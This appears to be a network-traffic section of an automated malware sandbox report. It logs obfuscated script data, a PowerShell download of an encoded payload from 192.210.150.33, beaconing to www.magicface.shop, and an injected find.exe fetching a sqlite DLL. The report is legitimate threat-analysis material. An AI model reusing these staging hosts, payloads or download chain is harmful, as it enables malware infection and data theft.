                                                  Data Raw: ff fe 0d 00 0a 00 4a 00 78 00 41 00 62 00 4b 00 57 00 47 00 7a 00 41 00 52 00 20 00 3d 00 20 00 22 00 6d 00 69 00 69 00 6e 00 43 00 6b 00 4b 00 47 00 43 00 62 00 22 00 0d 00 0a 00 4f 00 47 00 55 00 6e 00 63 00 52 00 67 00 71 00 66 00 55 00 20 00 3d 00 20 00 22 00 4c 00 4b 00 50 00 6f 00 7a 00 7a 00 4a 00 7a 00 63 00 47 00 22 00 0d 00 0a 00 78 00 4b 00 63 00 47 00 72 00 52 00 63 00 63 00 63 00 6c 00 20 00 3d 00 20 00 22 00 68 00 4c 00 54 00 4c 00 6a 00 62 00 55 00 4c 00 4c 00 78 00 22 00 0d 00 0a 00 50 00 63 00 7a 00 7a 00 6c 00 4f 00 70 00 4c 00 6d 00 64 00 20 00 3d 00 20 00 22 00 7a 00 63 00 69 00 4c 00 61 00 70 00 78 00 4f 00 42 00 6a 00 22 00 0d 00 0a 00 6b 00 57 00 41 00 6b 00 6f 00 57 00 4b 00 4e 00 4b 00 69 00 20 00 3d 00 20 00 22 00 47 00 7a 00 5a 00 61 00 61 00 69 00 41 00 4c 00 47 00 4e 00 22 00 0d 00 0a 00 5a 00 57 00 6b 00 63 00 4c 00 41 00 55 00 50 00 6d 00 65 00 20 00 3d 00 20 00 22 00 55 00 4b 00 57 00 57 00 41 00 70 00 4b 00 57 00 6c 00 68 00 22 00 0d 00 0a 00 4c 00 6f 00 69 00 69 00 [TRUNCATED]
                                                  Data Ascii: JxAbKWGzAR = "miinCkKGCb"OGUncRgqfU = "LKPozzJzcG"xKcGrRcccl = "hLTLjbULLx"PczzlOpLmd = "zciLapxOBj"kWAkoWKNKi = "GzZaaiALGN"ZWkcLAUPme = "UKWWApKWlh"LoiiLIzgtt = "vfiBhfLWcG"aLbeLdenpu = "LUoiqNslBB"fWZnsKWLCf = "xnWfKiCBza"KWqnxjARiL = "LKZacQtqph"mkzZKkUipK = "aRdpvkeaqz"psPLiLSLQW = "QNWmeLOGSU"KhiWWkbpaH = "WmWnLUCLBa"qUgLlKGIaO = "LzSWNpKWgG"RRisGUkzcc = "mZzhsfZLIn"AzZWKWUiiG = "rKpUcWpQkG"JGiUlihteo = "UIfQAhpnko
                                                  Aug 16, 2024 09:32:41.419039965 CEST1236INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 4c 00 63 00 6f 00 6f 00 57 00 53 00 4c 00 41 00 68 00 4a 00 20 00 3d 00 20 00 22 00 4e 00 72 00 63 00 62 00 52 00 6e 00 75 00 62 00 68 00 4f 00 22 00 0d 00 0a 00 5a 00 75 00 41 00 7a 00 52 00 6e 00 4e 00 66 00 4a
                                                  Data Ascii: "LcooWSLAhJ = "NrcbRnubhO"ZuAzRnNfJP = "WfsarcotripsiapuRLpN"PWLLLIZWWK = "kLGcKxGJnR"qlmKiWoSZu = "OKoLhNNsov"
                                                  Aug 16, 2024 09:32:41.419075012 CEST1236INData Raw: 00 65 00 72 00 22 00 0d 00 0a 00 69 00 75 00 64 00 57 00 70 00 57 00 4c 00 6b 00 4c 00 4c 00 20 00 3d 00 20 00 22 00 55 00 47 00 75 00 57 00 54 00 66 00 6f 00 78 00 41 00 52 00 22 00 0d 00 0a 00 64 00 49 00 78 00 4b 00 63 00 51 00 63 00 4c 00 55
                                                  Data Ascii: er"iudWpWLkLL = "UGuWTfoxAR"dIxKcQcLUv = "zcbfajLUJf"oKWUicGfkp = "fUbZNBkBbL"WPkilhWknK = "AWGiaBWzWG"AvIqWfJH
                                                  Aug 16, 2024 09:32:41.419109106 CEST672INData Raw: 00 75 00 4a 00 4c 00 6e 00 6e 00 63 00 62 00 78 00 57 00 22 00 0d 00 0a 00 75 00 78 00 4b 00 47 00 4b 00 4e 00 4b 00 63 00 50 00 4c 00 20 00 3d 00 20 00 22 00 6d 00 57 00 63 00 75 00 57 00 63 00 69 00 4e 00 4b 00 69 00 22 00 0d 00 0a 00 63 00 43
                                                  Data Ascii: uJLnncbxW"uxKGKNKcPL = "mWcuWciNKi"cCbrKeLLPc = "ZfqaUTNgLn"eUGiWilCqi = "LvkALLIqOj"jLziNGKPkP = "WkbOPCAgLN"e
                                                  Aug 16, 2024 09:32:41.419142962 CEST1236INData Raw: 00 0d 00 0a 00 57 00 61 00 4e 00 6f 00 5a 00 78 00 55 00 4b 00 63 00 4e 00 20 00 3d 00 20 00 22 00 62 00 51 00 50 00 4c 00 4b 00 4e 00 6a 00 4c 00 78 00 50 00 22 00 0d 00 0a 00 4c 00 78 00 63 00 61 00 57 00 4b 00 6c 00 5a 00 62 00 4f 00 20 00 3d
                                                  Data Ascii: WaNoZxUKcN = "bQPLKNjLxP"LxcaWKlZbO = "pLiKUPPCim"RTLciAiLWi = "GbgvWfoULi"UtGWilOGzp = "OtupGpkpWP"vtdKBHioo
                                                  Aug 16, 2024 09:32:41.419181108 CEST1236INData Raw: 00 0d 00 0a 00 61 00 4a 00 6b 00 62 00 47 00 55 00 72 00 62 00 6f 00 47 00 20 00 3d 00 20 00 22 00 64 00 50 00 4c 00 4f 00 64 00 74 00 7a 00 61 00 66 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 50 00 42 00 55 00 4b 00 73 00 51 00 76 00 6c 00 63 00 68
                                                  Data Ascii: aJkbGUrboG = "dPLOdtzafL"PBUKsQvlch = "KmLucziZcN"JNijLdnULN = "qZrcxTkdWG"PUOeKLLHQd = "UcWLROSAWO"RZCkozLoL
                                                  Aug 16, 2024 09:32:41.419218063 CEST1236INData Raw: 00 4e 00 57 00 43 00 4f 00 7a 00 55 00 22 00 0d 00 0a 00 70 00 6b 00 52 00 69 00 4b 00 4e 00 4a 00 70 00 4b 00 4a 00 20 00 3d 00 20 00 22 00 41 00 57 00 7a 00 61 00 50 00 6c 00 4b 00 4e 00 71 00 41 00 22 00 0d 00 0a 00 4c 00 55 00 57 00 4f 00 68
                                                  Data Ascii: NWCOzU"pkRiKNJpKJ = "AWzaPlKNqA"LUWOhrQxNx = "zSKrApUqWW"pepohkiLGZ = "pidiWNWznL"zbLHBSKLlK = "npLpkkiLdL"coxL
                                                  Aug 16, 2024 09:32:41.419251919 CEST1236INData Raw: 00 0d 00 0a 00 4e 00 50 00 6c 00 69 00 41 00 43 00 65 00 4c 00 43 00 63 00 20 00 3d 00 20 00 22 00 50 00 6b 00 57 00 6f 00 4c 00 5a 00 61 00 53 00 5a 00 55 00 22 00 0d 00 0a 00 6f 00 47 00 50 00 4f 00 57 00 6c 00 75 00 75 00 69 00 4b 00 20 00 3d
                                                  Data Ascii: NPliACeLCc = "PkWoLZaSZU"oGPOWluuiK = "edzKheQkiP"GsptoLbLKL = "RklKRWAsoR"kemnmNKzWL = "KhxcckGhWp"ZIZcPWBZnd
                                                  Aug 16, 2024 09:32:41.419290066 CEST1236INData Raw: 00 7a 00 76 00 20 00 3d 00 20 00 22 00 42 00 76 00 47 00 57 00 6d 00 57 00 6d 00 54 00 42 00 63 00 22 00 0d 00 0a 00 6e 00 47 00 71 00 50 00 78 00 6e 00 4b 00 7a 00 52 00 47 00 20 00 3d 00 20 00 22 00 69 00 4b 00 42 00 47 00 65 00 61 00 55 00 57
                                                  Data Ascii: zv = "BvGWmWmTBc"nGqPxnKzRG = "iKBGeaUWgZ"iUpiWzzLOk = "ZkJCmmsQch"LLUGKLiOaz = "mWdhWneLPQ"ZCSGSLOUtU = "mLtLQUJ
                                                  Aug 16, 2024 09:32:41.419327021 CEST1236INData Raw: 00 4e 00 69 00 6f 00 78 00 6d 00 4c 00 22 00 0d 00 0a 00 41 00 71 00 49 00 54 00 7a 00 4b 00 5a 00 63 00 74 00 4c 00 20 00 3d 00 20 00 22 00 78 00 66 00 6e 00 4c 00 4c 00 6b 00 4c 00 63 00 4b 00 70 00 22 00 0d 00 0a 00 5a 00 52 00 49 00 57 00 70
                                                  Data Ascii: NioxmL"AqITzKZctL = "xfnLLkLcKp"ZRIWpSRKLG = "POKiGzWRBq"iGBoaoLiki = "hdfLWULWtN"GLWNfWCzKG = "LhenLCLGLW"kW
                                                  Aug 16, 2024 09:32:41.424169064 CEST1236INData Raw: 00 0a 00 65 00 6b 00 4f 00 7a 00 71 00 55 00 4e 00 70 00 72 00 6b 00 20 00 3d 00 20 00 22 00 57 00 61 00 4c 00 4b 00 50 00 63 00 5a 00 53 00 57 00 48 00 22 00 0d 00 0a 00 78 00 6d 00 70 00 69 00 47 00 6f 00 66 00 64 00 57 00 66 00 20 00 3d 00 20
                                                  Data Ascii: ekOzqUNprk = "WaLKPcZSWH"xmpiGofdWf = "fmcLKfJmgO"hWNZALULOi = "ogLflpLhuW"eOOsWzmzLn = "ncIUxnWRiL"pQPLrkvixL =


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.2249172192.210.150.33803248C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:32:48.231410027 CEST75OUTGET /143/WRG.txt HTTP/1.1
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
                                                  Aug 16, 2024 09:32:48.734596968 CEST1236INHTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:48 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:26:58 GMT
                                                  ETag: "5d2ac-61f9fa6c34c98"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 381612
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain
                                                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Aug 16, 2024 09:32:48.734649897 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Aug 16, 2024 09:32:48.734687090 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQvIWwisQ2DyKDr3mUZDxgtb9gJwHbxA7QWwWfTZeANNJoTm/cXEMy+VIcLeDATo1NbN+tpcRk/G0mciKO+X6vKucKeTMBKiXZ7RHoJ+fa4agSuWzOdbzTx3b+Th7Hgg0NV19sKOi80F+qQxXIMQS2PvAig
                                                  Aug 16, 2024 09:32:48.734721899 CEST1236INData Raw: 73 57 57 7a 4c 57 69 38 68 77 47 76 61 64 30 72 72 54 58 41 73 75 51 75 7a 30 41 49 67 43 57 76 41 70 50 75 7a 6c 39 46 77 2b 50 63 66 47 7a 73 59 34 67 45 62 4e 48 49 30 48 6a 58 6c 53 58 48 33 6a 48 71 63 59 57 51 2f 33 49 54 75 70 36 69 4a 4a
                                                  Data Ascii: sWWzLWi8hwGvad0rrTXAsuQuz0AIgCWvApPuzl9Fw+PcfGzsY4gEbNHI0HjXlSXH3jHqcYWQ/3ITup6iJJGzUsBPX5Xw7GzLtpv+L90KxmP2V1RCGnBjsZyTdSoX8IWtsUkzZQ3typObSPAwmZqlH8/mQ0/bXfVJn6Y4Kh7cwRqGRw+rB/HLNMaGeB38RzIovYc3nDPCGalbJzOgfi0rdsRNkQcIFBvw5gL8rpLmNsrlG97H0ni
                                                  Aug 16, 2024 09:32:48.734772921 CEST1236INData Raw: 72 4e 65 6b 48 6f 2b 32 36 74 42 2f 66 61 55 73 74 6e 66 54 43 71 64 32 78 2b 68 47 45 6a 6a 6a 55 73 76 71 35 37 56 4b 79 2f 65 38 66 6f 2f 77 4a 4b 74 6a 44 6f 31 4f 66 4d 65 2f 4f 6b 4f 6c 78 62 61 55 47 30 79 54 4b 35 52 4d 53 66 4e 6f 4f 35
                                                  Data Ascii: rNekHo+26tB/faUstnfTCqd2x+hGEjjjUsvq57VKy/e8fo/wJKtjDo1OfMe/OkOlxbaUG0yTK5RMSfNoO5fXecDW+G1k1OSIbhLCsCiaU2Rah/6VbUeW87wmwljTSQgjKI5h+onBmSrEuOeQqD/CpsHZg3cB1Ca60HoB0OzD0RW3FUanEJouHDcjKqK3O0VSoD3MrW0x7ZtlHnURXw3VX0T9YJheOm1hbakg8CumlPkWL4t8Vfd
                                                  Aug 16, 2024 09:32:48.734838963 CEST672INData Raw: 2b 6a 70 4b 72 42 68 4f 4e 6b 36 53 53 67 65 38 4f 41 4f 62 57 2b 67 38 46 66 72 55 4f 78 53 37 6d 4f 50 55 50 4f 36 73 4e 5a 53 38 31 37 55 6e 67 67 45 5a 6e 69 69 68 64 55 46 33 70 69 37 50 46 43 43 72 44 5a 6e 62 66 42 33 4d 41 39 57 51 65 61
                                                  Data Ascii: +jpKrBhONk6SSge8OAObW+g8FfrUOxS7mOPUPO6sNZS817UnggEZniihdUF3pi7PFCCrDZnbfB3MA9WQeaQaoDYSk9q4FpquqO9MPRwer6tO4lNjdtwE/l8jOXfrG4JaggolWqmLmd7x6rFlxsFG4MAES691s3Hx+uPqc6dDJQoZDSbBPYrVLSHacRTTujh7+HcpILxKz/M4Jyd/ZwnkZYmFxBlRgH3+12a87oO2gi3GjpOvlxT
                                                  Aug 16, 2024 09:32:48.734873056 CEST1236INData Raw: 55 68 75 74 6d 74 65 52 2f 42 4f 49 64 54 61 37 42 7a 4a 2b 61 31 36 7a 66 67 49 4c 61 45 63 67 39 48 42 30 39 66 53 4d 39 72 42 4d 79 4f 4d 63 6a 58 6d 52 57 46 51 37 6a 69 6f 58 76 46 67 76 41 4d 2f 39 49 66 77 74 79 72 55 61 78 6e 69 37 78 30
                                                  Data Ascii: UhutmteR/BOIdTa7BzJ+a16zfgILaEcg9HB09fSM9rBMyOMcjXmRWFQ7jioXvFgvAM/9IfwtyrUaxni7x0PQV969eL3t49zPMIv2fSObe8VL/J/1yx/1l7ptU/bmO+HlV+s2gVTwWD9VcBRMKUSwJHDdsRYASi7Vl0lhCGx51cYvtwBR83ZEeC2lleTPOH66GNqQofIWEYzbxc2+vJFeavyl7qGRMwmclxS7dmj7ZoumgdRM2sU
                                                  Aug 16, 2024 09:32:48.734908104 CEST1236INData Raw: 73 31 5a 51 78 6b 6f 78 38 61 48 45 39 52 79 49 41 42 45 2f 62 45 42 4e 71 6d 34 72 6e 35 52 57 30 6f 4f 79 38 4f 76 4c 63 4c 6f 55 35 4c 4b 64 4a 38 78 53 47 72 67 70 45 6f 4d 57 58 51 65 49 58 71 63 78 78 67 32 62 2b 30 4d 41 45 35 4f 34 44 58
                                                  Data Ascii: s1ZQxkox8aHE9RyIABE/bEBNqm4rn5RW0oOy8OvLcLoU5LKdJ8xSGrgpEoMWXQeIXqcxxg2b+0MAE5O4DXIS5WT8/V/+4JO+NOjKWtGXczQTh7ae+BvIjBL61zhUwhYsbVi7fLDK0aPbvVfXTNgH6e9h7AZFpDlXzve0s4nrvk/Lps2UHTc6WK1DvjLPBuVS//+4niRGdZrgWEKKs1JsnozcLE684v7ZBD7wPRVr3wdn3gFc7UF
                                                  Aug 16, 2024 09:32:48.734940052 CEST1236INData Raw: 51 41 69 4d 2f 73 57 37 7a 4e 44 67 49 42 36 4b 39 71 6f 6d 79 48 38 4d 6b 62 54 70 51 71 48 6d 49 58 4c 53 74 78 64 33 58 35 67 75 34 4e 30 52 79 33 46 7a 69 37 56 57 68 45 6b 4b 39 39 75 70 34 68 4b 75 52 37 38 79 34 51 39 62 42 42 41 57 36 34
                                                  Data Ascii: QAiM/sW7zNDgIB6K9qomyH8MkbTpQqHmIXLStxd3X5gu4N0Ry3Fzi7VWhEkK99up4hKuR78y4Q9bBBAW644QWeqfB9w5izK/ZRWG06RRh/73DPbU83LGeD+MvZ00lMiFYCJ42w1JpZoDGJ75FIrMZal2oqtZ5TUWicowrmkzfhF5UlE2kelSOLyg03VsBlsvtiZTwTPHlVtRgDXO78TshmlSywaOqYl9kqGhQ+33SJJEE7kgK+e
                                                  Aug 16, 2024 09:32:48.734977961 CEST1236INData Raw: 61 63 54 77 69 78 52 76 55 37 53 71 2f 45 6c 76 59 32 61 38 4a 31 6f 7a 4e 76 58 58 6e 4c 42 4a 79 65 73 4d 67 48 2f 49 56 58 4f 2f 36 6b 73 39 70 6e 2b 73 50 52 33 79 5a 2f 63 49 4b 43 6a 4f 7a 6a 68 62 4c 49 4e 63 54 49 6c 69 4e 52 43 36 6b 33
                                                  Data Ascii: acTwixRvU7Sq/ElvY2a8J1ozNvXXnLBJyesMgH/IVXO/6ks9pn+sPR3yZ/cIKCjOzjhbLINcTIliNRC6k3LQhnpLDFyIreWcyXU8AzD7jLuy1IZovkiE5O+OuagknvN7KsrAqTZ5nLH6S7e52htMr12ofI6FMfCzMg7bYulaXR0wE2B477VLKUfUAGamAeOkBCy3ABGOx+o7TH/FKT6aK7gwgE9hsRFGtSUPBcEpfTxerYBs8Dd
                                                  Aug 16, 2024 09:32:48.744679928 CEST1236INData Raw: 4f 72 77 2b 32 67 4c 59 59 4e 78 51 6f 43 34 6a 52 55 77 42 2f 79 65 76 37 58 2b 46 41 4f 70 6e 6e 73 69 35 68 63 41 37 2b 36 72 78 5a 71 41 71 77 62 5a 37 6d 73 75 4b 72 77 38 69 42 33 62 4a 61 30 6c 50 70 2f 46 4b 30 70 4f 4f 48 68 43 50 74 4c
                                                  Data Ascii: Orw+2gLYYNxQoC4jRUwB/yev7X+FAOpnnsi5hcA7+6rxZqAqwbZ7msuKrw8iB3bJa0lPp/FK0pOOHhCPtLzCDUtBzhv6JSI0dtbBN7y2uTVr/fsU/ge2tFVnrXpjSUqKRBFRy0F2zLVUPemhvHwFMVktK7nXJ1NCyXsAIA4+CVH0GH9BSQAUBkmaTjTlQvIVotVYYZoOG7yTbDES2NtIbIyDLFh1pNrYf9h22gWkMahzWxiqhu1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.224917376.223.54.146801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:13.820579052 CEST347OUTGET /0ulx/?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46 HTTP/1.1
                                                  Host: www.magicface.shop
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:14.297131062 CEST393INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Fri, 16 Aug 2024 07:33:14 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 253
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 78 57 3d 7a 6f 66 45 69 69 46 59 77 4d 68 35 4c 78 79 4e 75 36 6f 58 53 64 57 57 63 56 38 42 36 37 4a 39 61 44 76 65 2b 2b 37 61 62 71 77 2b 2f 5a 6f 34 32 4b 6c 78 4c 47 6a 51 35 47 65 54 42 59 51 79 55 59 6d 6a 73 70 48 65 63 36 35 44 4f 57 51 39 55 53 73 6f 6d 74 44 2b 72 43 6a 65 6f 7a 6c 50 31 59 55 64 57 48 6e 4d 53 5a 43 72 34 42 78 77 51 77 6b 38 4d 42 39 46 44 4d 56 4c 26 6f 34 3d 6a 6e 31 4c 34 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.224917445.33.6.223803408C:\Windows\SysWOW64\find.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:18.698287964 CEST220OUTGET /2017/sqlite-dll-win32-x86-3200000.zip HTTP/1.1
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Aug 16, 2024 09:33:19.215090036 CEST249INHTTP/1.1 200 OK
                                                  Connection: keep-alive
                                                  Date: Fri, 16 Aug 2024 07:33:19 GMT
                                                  Last-Modified: Mon, 21 Aug 2017 00:19:00 GMT
                                                  Cache-Control: max-age=120
                                                  ETag: "m599a26f4s6ce10"
                                                  Content-type: application/zip; charset=utf-8
                                                  Content-length: 445968
                                                  Aug 16, 2024 09:33:19.215362072 CEST1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 13 a7 01 4b 18 14 41 7f d2 04 00 00 eb 13 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 96 88 80 59 96 88 80 59 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6
                                                  Data Ascii: PKKAsqlite3.defUTYYuxd(ydrTv{sa,=3O>B*$&LT1?5<iUFKOb>sU80[YYy$p8kLu+5'pbID)t!;:
                                                  Aug 16, 2024 09:33:19.215379000 CEST1236INData Raw: be 4d ca 4f 74 78 66 fb 2c 3d a6 c1 14 c3 fa e7 6f 54 6c f6 ac 4d 35 6f c1 ce 59 06 7a 21 57 1d 2b 70 85 45 cc 75 bc 09 9f ac 95 d7 40 55 5a f3 37 aa d1 8c bb b6 4e df 69 f3 8f 2b f8 24 99 e3 f6 e5 3f 50 4b 03 04 14 00 00 00 08 00 13 a7 01 4b bb
                                                  Data Ascii: MOtxf,=oTlM5oYz!W+pEu@UZ7Ni+$?PKK%Rsqlite3.dllUTYYuxdxT89I&`FjFh'&D VS{9$@D=j^^oko@!6D3ZI&
                                                  Aug 16, 2024 09:33:19.215394020 CEST1236INData Raw: ba 3c d5 8a 40 b1 00 76 34 ee 65 ab 09 46 94 fc b5 aa 5b 8c 91 c7 2c d2 6d 98 83 3c 9c ca e3 d7 ae 97 8c af d1 89 8f 7e 15 0e 43 22 4c b0 d9 f5 8f e6 18 ac 05 ba 18 96 0f 26 13 15 46 a1 b8 51 f9 cb 4d 08 5e d5 60 90 15 6f 38 aa 2c 4c 77 e9 b3 ea
                                                  Data Ascii: <@v4eF[,m<~C"L&FQM^`o8,LwhOLUAlg_ZOY}NqF;&!UpM\h+[jC]f_CWDOrsLXp5,c`UVkN>'D7.EUu
                                                  Aug 16, 2024 09:33:19.215418100 CEST1236INData Raw: a8 6d 1c 0a 62 3d bc e8 dd 1d e8 39 7c f8 b0 2d 70 fb 26 5f 4f 82 ac a5 93 a6 7d 28 23 0d 3f d6 49 8a 3b eb c7 16 90 e2 1e ee 92 c5 d7 39 cb df c3 1d 0d fb da 88 af 93 f8 7b b4 7f af 88 df 1d e8 3c 04 45 b7 35 19 15 50 df 61 8b af 0d 6a 85 9a b6
                                                  Data Ascii: mb=9|-p&_O}(#?I;9{<E5Paj/amz>XFK*a:?jr7jzVa=7a4p\5f0Qw1\n3?fz{p|HOSs9T ?A|H
                                                  Aug 16, 2024 09:33:19.215434074 CEST1236INData Raw: c3 7d 49 4b c7 5c db 17 33 94 8e df 71 6d c1 77 22 f5 92 13 24 d0 27 37 71 e4 a8 7c d2 e4 0e f4 55 24 97 c7 b8 a5 de d2 d9 b4 58 c5 a5 d0 31 e3 08 e9 82 e5 b5 19 98 bf 89 89 36 da 8b 0c f5 f6 19 a4 61 f8 d4 3d 08 70 1f d6 0a 6c 13 7c 91 47 81 37
                                                  Data Ascii: }IK\3qmw"$'7q|U$X16a=pl|G7*G{$ZA2%nF;/n'6^_X/j<"lC*''/iWB+M>HK1kBZXeiU,+yG@o,2IN.xpe8`CooZE
                                                  Aug 16, 2024 09:33:19.215449095 CEST1236INData Raw: a6 14 5a c9 45 f5 10 4a 81 66 32 df 58 6c 14 77 77 be 3c ca ed ba 8b b5 56 d9 12 66 2b c8 46 2e a9 bd 08 25 93 d4 57 85 c5 db c8 32 1b 5d 66 25 97 80 a1 ea 54 9b 91 f3 be 4c 96 59 b5 39 74 95 95 d8 9b b3 d9 76 68 ce d6 d1 53 4b a3 7c d0 46 5a 26
                                                  Data Ascii: ZEJf2Xlww<Vf+F.%W2]f%TLY9tvhSK|FZ&)J$)fR(VHyj ';JJ#K3532STh+ w= a#Ll<bU$?;v`Ji62,
